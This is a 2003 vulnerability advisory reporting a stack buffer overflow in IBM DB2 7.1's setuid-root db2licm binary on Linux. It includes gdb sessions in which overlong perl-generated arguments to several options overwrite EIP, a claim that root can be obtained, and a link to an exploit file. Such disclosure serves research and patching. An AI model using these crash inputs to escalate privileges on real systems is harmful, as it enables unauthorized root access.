Title: Local Vulnerability at db2 7.1 via db2licm binary Date: 4-08-2003 Platform: Only tested in Linux but can be exported to others. Impact: Users belonging db2iadm1 group in a default installation or with exec permision over db2licm binary can obtain euid=0 Author: Juan Manuel Pascual Escriba Status: Vendor contacted PROBLEM SUMMARY: Stack Buffer overflow exists in many parameters like argv[1], -a, -l , -v .. in a root setuid binary called db2licm. Only users int db2iadm1 group can execute this binary in my default installation. [pask@dimoniet db2licm]$ ls -alc /home/db2inst1/sqllib/adm/db2licm -r-sr-x--- 1 root db2iadm1 31926 Aug 7 2003 /home/db2inst1/sqllib/adm/db2licm [pask@dimoniet db2licm]$ gdb /home/db2inst1/sqllib/adm/db2licm (gdb) r `perl -e 'print "A"x990'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/db2inst1/sqllib/adm/db2licm `perl -e 'print "A"x990'` (gdb) info reg ... ebp 0x41414141 0x41414141 esi 0x2 2 edi 0x0 0 eip 0x41414145 0x41414145 ... (gdb) r -a `perl -e 'print "A"x990'` ... ebp 0x41414141 0x41414141 esi 0x3 3 edi 0x0 0 eip 0x41414145 0x41414145 ... (gdb) r -l `perl -e 'print "A"x990'` ... ebp 0x41414141 0x41414141 esi 0x3 3 edi 0x0 0 eip 0x41414145 0x41414145 ... (gdb) r -v `perl -e 'print "A"x990'` ... ebp 0x41414141 0x41414141 esi 0x3 3 edi 0x0 0 eip 0x41414145 0x41414145 ... It's posible to achieve root privileges through this bug. IMPACT: Any user with exec permision over db2licm could achieve root privileges. In my default installation only users in db2iadm1 can exec this binary. SOLUTION: No workaround. EXPLOIT http://concepcion.upv.es/~pask/exploits/IBM-DB2-db2licm.c -------------------------------------------------- This vulnerability was researched by: Juan Manuel Pascual Escriba pask@uninet.edu Barcelona - Spain http://concepcion.upv.es/~pask/